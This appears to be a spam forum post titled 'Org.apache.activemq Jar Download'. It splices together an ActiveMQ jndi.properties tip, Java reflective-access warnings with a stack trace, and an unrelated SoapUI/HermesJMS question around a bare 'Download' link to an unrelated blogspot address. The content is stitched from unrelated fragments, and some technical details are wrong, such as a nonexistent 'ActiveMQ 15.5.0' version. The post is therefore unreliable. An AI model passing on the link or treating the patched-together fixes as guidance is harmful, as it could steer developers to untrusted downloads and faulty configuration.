Org.apache.activemq Jar Download

0 views
Skip to first unread message

Marilu Lukaszewski

unread,
Jan 9, 2024, 4:57:19 AM1/9/24
to picsinglyhe

I was having the same issue and just wanted to pass along the solution in case anyone comes across it again. The solution was to create a jar file with the jndi.properties file, this allowed the properties to be read. And in the case of ActiveMQ 15.5.0 the property for connectionFactoryNames was added as shown below:
//-----
java.naming.factory.initial = org.apache.activemq.jndi.ActiveMQInitialContextFactory
connectionFactoryNames = connectionFactory, queueConnectionFactory, topicConnectionFactry
java.naming.provider.url = tcp://localhost:61616
queue.MyQueue = EVENTS.Q
//-----

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by org.apache.activemq.util.IntrospectionSupport (file:/C:/Users/user/.m2/repository/org/apache/activemq/activemq-client/5.15.13/activemq-client-5.15.13.jar) to method sun.security.ssl.SSLSocketImpl.setHost(java.lang.String)
WARNING: Please consider reporting this to the maintainers of org.apache.activemq.util.IntrospectionSupport
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release

org.apache.activemq jar download


Download https://7scopexwgluczu.blogspot.com/?amfs=2x674f



WARNING: Illegal reflective access by org.apache.activemq.util.IntrospectionSupport (file:/C:/Users/user/.m2/repository/org/apache/activemq/activemq-client/5.15.13/activemq-client-5.15.13.jar) to method sun.security.ssl.SSLSocketImpl.setHost(java.lang.String) at org.apache.activemq.util.IntrospectionSupport.setProperty(IntrospectionSupport.java:181) at org.apache.activemq.util.IntrospectionSupport.setProperties(IntrospectionSupport.java:155) at org.apache.activemq.util.IntrospectionSupport.setProperties(IntrospectionSupport.java:140) at org.apache.activemq.transport.tcp.SslTransport.(SslTransport.java:81) at org.apache.activemq.transport.tcp.SslTransportFactory.createTransport(SslTransportFactory.java:122) at org.apache.activemq.transport.TransportFactory.doConnect(TransportFactory.java:120) at org.apache.activemq.transport.TransportFactory.connect(TransportFactory.java:65) at org.apache.activemq.ActiveMQConnectionFactory.createTransport(ActiveMQConnectionFactory.java:331)

I am testing an ActiveMQ with SoapUI - HermesJMS but I got the error "baseDirectory is not a valid property for org.apache.activemq.ActiveMQConnectionFactory - removed". After I selected the plug-in ActivateMQ, I cannot open the created session to add properties or change the properties.

35fe9a5643
Reply all
Reply to author
Forward
0 new messages